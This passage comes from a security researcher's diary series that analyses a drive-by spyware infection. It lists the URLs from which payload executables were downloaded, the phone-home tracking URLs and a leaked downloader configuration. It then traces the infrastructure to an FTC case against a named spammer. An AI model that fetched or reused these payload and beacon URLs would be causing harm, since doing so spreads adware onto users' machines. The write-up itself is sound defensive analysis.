Immediately upon receiving the “US” country code from mastermind.com, Joe’s computer contacts "http://bins2.media-motor.net/soft/mm20.ocx" and downloads, installs, and registers this 61,440 byte OCX. Examining this file, it appears to be an OCX version of hp1.exe. It contains many of the same strings, and appears to offer the same functionality. I would assume that it acts as a resident version of hp1.exe.

Next, hp1.exe contacts "http://bins2.media-motor.net/soft/loads/8-24.exe" and downloads a 40,960 byte executable. The “8-24” name is derived from the date at the time of the download (August 24th).

Based upon the “marching orders” within the unencrypted datafile, Joe’s computer now contacts "http://www.avatarresources.com/dist/ast_4_mm.exe" and downloads a 129,152 byte executable. It then contacts "http://bins2.media-motor.net/soft/MediaMotor25.exe" and downloads a 9,056 byte executable.

Both of these files are launched, and MediaMotor25.exe immediately initiates a download from "http://64.7.220.98/downloads/IeBHOs.dll" which is a 129,536 byte long BHO (Browser Helper Object) that is installed into (duh) IE (Internet Explorer). IeBHOs.dll is a known component of adware from “e2give.” Because it is installed into IE and becomes, essentially, part of the browser, it is in the perfect position to monitor the URLs being “surfed” and to change Joe's browser's requests when going to specific sites in order to “direct” affiliate commissions to e2give. According to the e2give.com website, “e2give will donate a portion of each qualifying purchase to the e2give charities network.” This, of course, makes it perfectly fine for them to install their software onto Joe’s machine without his permission. (Yes, that was sarcasm.)

The ast_4_mm.exe file from avatarresources.com is a Wise installation executable. As it installs, it phones home to let the fine folks at avatarresources know that it has found a new place to live:

"http://www.avatarresources.com/count/count.php?&mm2_us&mm2_new_nocpr"

The Wise installation has its own downloading engine which contacts the interestingly named “www.wenksdisdkjeilsow.com” and accesses the URL “http:// www.wenksdisdkjeilsow.com/config/?v=5&n=mm2&i=” which, despite the fact that it generates errors, sends back more configuration information (sheesh guys, if you’re going to go through all the trouble to set this stuff up, at least set the permissions correctly on your scripts...)
566
<br />
Warning: SAFE MODE Restriction in effect.
The script whose uid is 500 is not allowed to access
/usr/local/psa/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/log owned by uid 10011 in/usr/local/psa/home
/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 24<br /><br />
Warning: fopen("/usr/local/psa/home/vhosts
/wenksdisdkjeilsow.com/httpdocs/config/log", "a") -
Inappropriate ioctl for device in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/index.php on line 24<br />
<br />
Warning: fputs(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 25<br />
<br />
Warning: fclose(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 26<br />
[URLS]
2,http://tt2.avres.net/tt/remove_spyware.exe
2,http://tt2.avres.net/tt/curgsi.exe
3,http://searchlocate.com/toolbar/searchlocate.exe

[VERSION]
5

[PROGRAM URL]
http://www.wenksdisdkjeilsow.com/files/ast_5_main.exe

[ID]
ArKJ9t9HzRnbf0GineJhq

[PRIORITY]
1,http://tt2.avres.net/tt/cpr_mm2.exe
2,http://tt2.avres.net/tt/ab1.exe
3,http://tt2.avres.net/tt/tvm_bundle.exe
4,http://tt2.avres.net/tt/cpr_mm2.exe

0
That’s just really BAD programming: you MUST check that those handles returned are valid when you open a file... dang... that’s Programming 101 Stuff. But I digress...

Hey! Look there! I see more URLs pointing to executable files. Gee, I wonder what’ll happen...?

Anyway... we now manage to round out the list of files that was in our original encrypted configuration data, and Joe’s machine goes out and grabs a file from "http://ups.roings.com/soft/unstall.exe." This actually does appear to be some sort of uninstall program, written in Visual Basic, and weighing in at 45,056 bytes. It only seems targeted at the files directly installed by the hp1.exe file, though.

But, lest we forget, we still have a Wise install running in the background. And, you guessed it, in “PRIORITY” order, it downloads:

"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes)
"http://tt2.avres.net/tt/ab1.exe" (500,869 bytes)
"http://tt2.avres.net/tt/tvm_bundle.exe" (53,738 bytes)
"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes - ????????)

Yes, you read that correctly. It DID download the exact same file twice. (It must be a personality trait of the morally bankrupt that they can be both clever and inane at the same time. The authors of these programs really do pull off some amazing stuff... but then they follow that up almost immediately by doing some amazingly STUPID stuff. Consistency guys, consistency...)

While all of that is happening, hp1.exe (Remember that file? It’s the one we started this installment with...) phones home to tell the folks at roing.com that all is well in malware-land, that it has done everything it was supposed to do, and that it deserves a big ol’ digital pat on the back:

"http:// logs.roings.com/log3.php?c={D358D17F-0D1A-4A98-A98D-810B01216183} &what=newinstall&aff=bigs104&country=US&ocx18=1&myexe=1&avatar=1&e2give=1"

“See! Look what I did! I installed ‘ocx18’ (mm20.ocx), ‘myexe’ (8-24.exe), ‘avatar’ (ast_4_mm.exe), and ‘e2give’ (MediaMotor25.exe) on this poor schmoe’s computer! Aren’t you proud of me?”

Not to be outdone, our Wise installer needs to phone home and let everyone know what a good job it did too:

"http://www.avatarresources.com/count/count.php?&mm2cpr_new"

So where does this leave us?

Well, Joe’s computer now has had so many fun and exciting “additions” installed I’m beginning to lose track. Let’s see: Joe’s computer now has two “affiliate buck” redirectors (SAHAgent and e2give), it’s had stuff from avatarresources.com installed, as well as all of those files from tt2.avres.net. And there’s more... trust me, there’s more.

Remember: this is all the result of visiting a SINGLE website with an unpatched machine.

If you ever need to explain to someone the pitfalls involved in not patching, all you need to do is point them to this listing:

The score card thus far (and I’m only counting executable content):

hp2.exe (16,384 bytes)
tvmupdater4bp5.exe (195,072 bytes)
AtPartners.dll (96,256 bytes)
SplWbr.dll (454,656 bytes – expands out to 3 files making up 892,288 bytes)
ezbdlLs.dll (151,040 bytes – expands out to 4 files making up 314,880 bytes)
hp1.exe (49,152 bytes)
mm20.ocx (61,440 bytes)
8-24.exe (40,960 bytes)
MediaMotor25.exe (9,056 bytes)
ast_4_mm.exe (129,152 bytes)
IeBHOs.dll (129,536 bytes)
cpr_mm2.exe (270,415 bytes)
ab1.exe (500,869 bytes)
tvm_bundle.exe (53,738 bytes)
and of course cpr_mm2.exe (270,415 bytes) again...

The shameful total (thus far... there’s more to come):
15 files – 2,428,141 bytes downloaded
20 files – 3,029,613 bytes on disk

And, no doubt, I missed a few...
I started Part II of “Bouncing Malware” by saying that Joe’s PC was no longer his own. With over 2 MB of software downloaded, installed, and executed without his permission, I would say that there is little doubt that Joe ISN’T the guy running the show. But who is?

In the next installment, I want to finish up looking at some of the software installed on Joe’s PC and then turn my sights to finding out a little more about the folks responsible for the deluge of spyware and adware that assault our machines and networks on a daily basis. Stay tuned... it’s gonna be fun.


------------------------------------------------------------------------

Tom Liston's Following the Bouncing Malware - Part IV:

-------------------------------------------------------------------------

For those that missed previous episodes:

Follow The Bouncing Malware - Part I - http://isc.sans.org/diary.php?date=2004-07-23
Follow The Bouncing Malware - Part II - http://isc.sans.org/diary.php?date=2004-08-23
Follow The Bouncing Malware - Part III - http://isc.sans.org/diary.php?date=2004-11-04

=========================================================================

Follow The Bouncing Malware - Part IV

As this little expedition has wound its way among the malicious flotsam and jetsam of the Internet, I’ve received hundreds of emails echoing the same question:

"Tom, please tell us: who are these people?"

(Ok... I’ve actually gotten ONE email and it asked me to please stop rambling so much. Consider the above to be "artistic license.")

So, rather than diving headfirst into dissecting more code this time, I thought I would take a little "side trip" and see what I could find out about the people who have given us the "gifts that keep on giving." Who are the people profiting off of messing up Joe’s machine?

Since we’ve got a different goal, it calls for a different attitude-- a kinder, gentler approach. We’re going to roll-back the geek-factor a bit and spend a little time away from the hard-core code analysis. To celebrate, I’m all decked out in my fuzzy Garfield slippers (small children/Father’s Day/no choice/don’t ask...) and I’m ready to rock. To round things out, let’s even give this installment a cool Sub-Title:

Follow The Bouncing Malware IV: Mellowing In Fleecy Footwear

(Sorry, couldn’t help myself)

Ok... Let’s see what we can find out...

If you’ve been following along since the beginning, perhaps you noticed something odd. Perhaps after reading through the description of what happened to Joe’s machine, you’ve a feeling that there’s something bigger going on-- something amiss with what you’ve seen, but you just can’t quite put your finger on it.

I know how you feel. It’s that "something" that’s been slowly pecking away at my subconscious since this whole trip began and has finally surfaced into consciousness only recently. Here it is:

In FTBM-1:

1) Joe goes to "yahoogamez.com" and gets served up a banner ad from aim4media.com
2) That ad contains an IFRAME that loads mynet-MML.html from 205.236.189.58
3) mynet-MML.html contains a script that loads hp2.htm from 69.50.139.61
4) hp2.htm whacks Joe’s box with a CHM exploit named (originally enough) hp2.chm
5) hp2.chm goes out and grabs a file called (seeing a pattern?) hp2.exe
6) hp2.exe installs "TV media display" on Joe’s machine.

In FTBM-2:

1) A trip to Joe’s new default home page (changed in FTBM-1 to "http://default-homepage-network.com"... no one ever said that these guys were creative when it came to names...) results in the display of "http://default-homepage-network.com/newspynotice.htm," a warning that Joe’s computer might be (well, duh!) infected with spyware.
2) In "newspynotice.htm," we found some obfuscated JavaScript that pointed an IFRAME to a file called (hold on.. in case you’re just skimming through this, you need to really start paying attention now, because this is important...) "hp1.htm" from 69.50.139.61
3) hp1.htm then whacks Joe's box with a CHM exploit named (originally enough) hp1.chm
4) hp1.chm goes out and grabs a file called (once again, seeing a pattern?) hp1.exe

Hey... HEY... HEY! What the heck is that all about?

Well, obviously, the folks who put mynet-MML.html on 205.236.189.58 and newspynotice.htm on "http://default-homepage-network.com" share the same stunted imagination when it comes to filenames.

Or something like that...

Therefore, our goal for today is to try to tie "http://default-homepage-network.com", 205.236.189.58, and 69.50.139.61 together.

So... where do we begin?

Doing a DNS lookup on "default-homepage-network.com" we find that it resolves to 205.236.189.57.

B-I-N-G-O!

Well, let’s see... who administers that block?:

Block: 205.236.189.0 - 205.236.189.255
Service Telematique Service Internet de Montreal
6187A Louis Veuillot
Montreal, QC H1M2N8
Canada

So how does 69.50.139.61 tie into this? They’re using that IP address to start the ball rolling, so to speak, but why use a different server?

Block: 69.50.139.0 - 69.50.139.127
OMEGABYTE Computer Corporation
205 West Ninth Street, Suite 201
Austin, TX 78701

A quick look at Omegabyte’s website shows us the beginnings of an answer: Omegabyte is a hosting provider. It appears that our "Canadian" friends at "default-homepage-network.com" rented themselves a server down in Texas. Why?

Well, if my little excursion into spyware-land has taught me anything, it’s that very little in this ever-shifting terrain stays static. The anti-spyware battle is fought with many of the same "rules" as the anti-virus battle: he who adapts the fastest survives. If you present a fixed target, you get filtered or blocked or "signatured" out of existence. At this point, many of the sites that I’ve mentioned in this chronicle are no longer spyware dumps, having long since been tossed aside once their useful lifetime had expired. In all likelihood, both the Canada and Texas sites are simply innocent hosting companies who were used for connectivity.

So it appears that the people in the spyware industry have taken a cue from the spammers and they use throwaway accounts and hosting services to do their dirty work. And just like with the spammers, by the time we get around to filtering and blocking a server, they’ve moved on to another.

While IP addresses may come and go, domain names are forever... So! What can we find out about "default-homepage-network.com"?

The domain name is registered to:

Seismic Entertainment Productions, Inc.
11 Farmington Road
Rochester, NH 03867

and a little searching on "Seismic Entertainment Productions, Inc." leads to:

http://www.ftc.gov/os/caselist/0423142/0423142.htm

Which is a document entitled: "Federal Trade Commission, Plaintiff, v. Seismic Entertainment Productions, Inc., SmartBot.net, Inc., and Sanford Wallace, Defendants., United States District Court, District of New Hampshire"

For those of you who have had any dealings in anti-spam circles, the name "Sanford Wallace" should ring a very VERY loud bell. Sanford "The Spam King" Wallace has had a very checkered past. His company, Cyber Promotions, was a target of much anti-spam rage in the late ‘90s. Supposedly ol’ "Spamford" had reformed his ways around the turn of the century and had gone "legit."

Apparently not...

It appears that Mr. Wallace has slipped into his old ways and gotten himself into a bit o’ trouble with the U.S. Federal Trade Commission for alleged "deceptive practices affecting commerce."

Strangely enough, if you read through the complaint linked at the FTC’s site:

http://www.ftc.gov/os/caselist/0423142/041012comp0423142.pdf

you’ll see that much of the badness that Mr. Wallace’s "Seismic Entertainment Products, Inc." is alleged to have done has been documented quite nicely in "Follow The Bouncing Malware." The complaint also specifies another of Mr. Wallace’s ventures, passthison.com, which is mentioned in FTBM-2.

According to the FTC’s complaint, the former Spam King's actions have placed him in the crosshairs of a Federal investigation carrying penalties "including, but not limited to, rescission of contracts and restitution, and the disgorgement of ill-gotten gains."

Personally, I’d pay foldin’ money to watch that "disgorgement of ill-gotten gains" part.

So, now let’s return to the question that prompted this little side-trip: “Who are these people?”

Well, at least in this case, we’re able to put an alleged name (and an alleged face, if you’re so inclined: http://www.annonline.com/interviews/970522/biography.html ) to one of the folks dumping spyware onto our computers.

Somehow, turning over this particular rock and finding a "reformed" spammer underneath it doesn’t seem so surprising. The ethical leap from spamming to spyware isn’t across a great chasm, but rather over a slight scratch in the pavement. Ethically challenged individuals, for whom the profit motive outweighs all else, seem quite at home in either category. What seems to be missing in their character boils down to a complete disregard for the legitimacy of property rights. To them, it’s not your inbox, your bandwidth, or your computer if they can figure out a way to sneak something past your defenses. In another time and place, they would be highwaymen, embezzlers, or con-artists.

Therefore, in honor of the season, I hereby nominate Sanford "The Spam King" Wallace for the first annual "ISC Tin-Pot Turkey" award for (allegedly) being both a low-life spammer and a scummy purveyor of spyware. Let's hope he spends some time in an orange jumpsuit, "married" to whoever has the most cigarettes.

In the next edition, I promise to editorialize a little less and return to analyzing malicious code. In the meantime, I’ll keep my eye on the FTC case and update you if anything happens.

Finally, before I once again take my leave and begin work on FTBM-5, I’d like to place a simple challenge onto the (virtual) table: Over the course of these articles, I’ve taken several jabs at the folks behind the crud that attempts to infest our computers each time we surf the web. I’ve questioned their skills and their ethics, and I stand behind every dang word I've written. If, however, you either work currently in the spyware industry or have in the past (and I know you guys are reading this...) and you would like to step forward (anonymously or not) and discuss or debate the ethics of what it is you do, please contact me using the ISC’s contact form, found at http://isc.sans.org/contact.php.

Yo Spamford! Care to chat?


Page Last Edited February 4, 2009 11:31